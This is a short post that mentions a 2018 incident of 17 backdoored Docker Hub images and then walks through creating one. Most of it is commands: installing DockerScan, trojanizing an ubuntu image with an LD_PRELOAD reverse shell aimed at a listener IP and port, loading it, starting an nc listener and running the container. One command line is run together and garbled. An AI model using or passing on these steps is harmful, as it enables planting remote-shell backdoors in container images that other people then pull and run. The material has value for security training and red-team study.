Over the past year, there were 17 backdoored Docker images identified and removed from Docker Hub. These malicious images, uploaded under the pseudonym “docker123321,” were used to install reverse shells and cryptocurrency miners on users’ servers. The images were available on Docker Hub between May 2017 and May 2018 before they were taken down. This situation highlights the importance of vigilance and the need for security measures when using public repositories to pull Docker images​. (The New Stack)
Download and install DockerScan
git clone https://github.com/cr0hn/dockerscan
cd dockerscan
sudo python3.6 setup.py install
Create Reverse shell with LD_PRELOAD *trick*
mkdir backdoor && cd backdoor
docker pull ubuntu:latest
docker save ubuntu:latest -o ubuntu-orginal
export LC_ALL=C.UTF-8
export LANG=C.UTF-8dockerscan image modify trojanize ubuntu-orginal <listener_ip> -p 45678 -o ubuntu-trojanized
docker load -i ubuntu-trojanized.tar
Setup Remote Listener and deploy image
remote_server> nc -l 45678
docker run -d ubuntu-trojanized